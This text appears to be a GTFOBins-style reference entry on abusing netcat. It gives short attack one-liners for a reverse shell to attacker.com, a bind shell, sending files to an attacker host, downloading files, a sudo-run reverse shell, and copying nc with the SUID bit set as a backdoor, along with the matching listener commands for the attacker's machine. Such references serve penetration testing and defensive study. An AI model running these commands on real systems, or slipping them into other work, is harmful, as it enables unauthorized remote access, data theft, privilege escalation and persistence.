It can send back a reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345 on the attacker box to receive the shell. This only works with netcat traditional.
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORTIt can bind a shell to a local port to allow remote network access.
Run nc target.com 12345 on the attacker box to connect to the shell. This only works with netcat traditional.
LPORT=12345
nc -l -p $LPORT -e /bin/shIt can exfiltrate files on the network.
Send a file to a TCP port. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"It can download remote files.
Fetch remote file sent to a local TCP port. Run nc target.com 12345 < "file_to_send" on the attacker box to send the file.
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
Run nc -l -p 12345 on the attacker box to receive the shell. This only works with netcat traditional.
RHOST=attacker.com
RPORT=12345
sudo nc -e /bin/sh $RHOST $RPORTIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run commands it only works on systems
like Debian that allow the default sh shell to run with SUID privileges.
Run nc -l -p 12345 on the attacker box to receive the shell. This only works with netcat traditional.
sudo sh -c 'cp $(which nc) .; chmod +s ./nc'
RHOST=attacker.com
RPORT=12345
./nc -e /bin/sh $RHOST $RPORT